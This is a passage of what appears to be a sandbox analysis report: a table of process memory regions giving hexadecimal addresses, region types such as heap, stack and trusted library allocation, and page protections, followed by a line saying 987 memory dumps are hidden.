heap
|
page read and write
|
||
1C5BE000
|
stack
|
page read and write
|
||
18677FC0000
|
heap
|
page execute and read and write
|
||
7FFD34500000
|
trusted library allocation
|
page read and write
|
||
200F2680000
|
heap
|
page read and write
|
||
7DF4C80A0000
|
trusted library allocation
|
page execute and read and write
|
||
23A02E1A000
|
trusted library allocation
|
page read and write
|
||
F68000
|
heap
|
page read and write
|
||
7FFD342B4000
|
trusted library allocation
|
page read and write
|
||
2A71F4F6000
|
heap
|
page read and write
|
||
7FFD34396000
|
trusted library allocation
|
page execute and read and write
|
||
1B5BD000
|
stack
|
page read and write
|
||
23A0283A000
|
trusted library allocation
|
page read and write
|
||
7FFD342E0000
|
trusted library allocation
|
page read and write
|
||
1140000
|
heap
|
page read and write
|
||
23A00162000
|
heap
|
page read and write
|
||
7FFD3436C000
|
trusted library allocation
|
page execute and read and write
|
||
BB0000
|
heap
|
page read and write
|
||
7FFD34706000
|
trusted library allocation
|
page read and write
|
||
7FFD342C2000
|
trusted library allocation
|
page read and write
|
||
7FFD34452000
|
trusted library allocation
|
page read and write
|
||
2A70747D000
|
trusted library allocation
|
page read and write
|
||
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
2A716FD1000
|
trusted library allocation
|
page read and write
|
||
23A1A406000
|
heap
|
page read and write
|
||
76F4A7E000
|
stack
|
page read and write
|
||
456A0E000
|
stack
|
page read and write
|
||
2A708DD3000
|
trusted library allocation
|
page read and write
|
||
2A7052D0000
|
heap
|
page read and write
|
||
76F4FFB000
|
stack
|
page read and write
|
There are 987 hidden memdumps, click here to show them.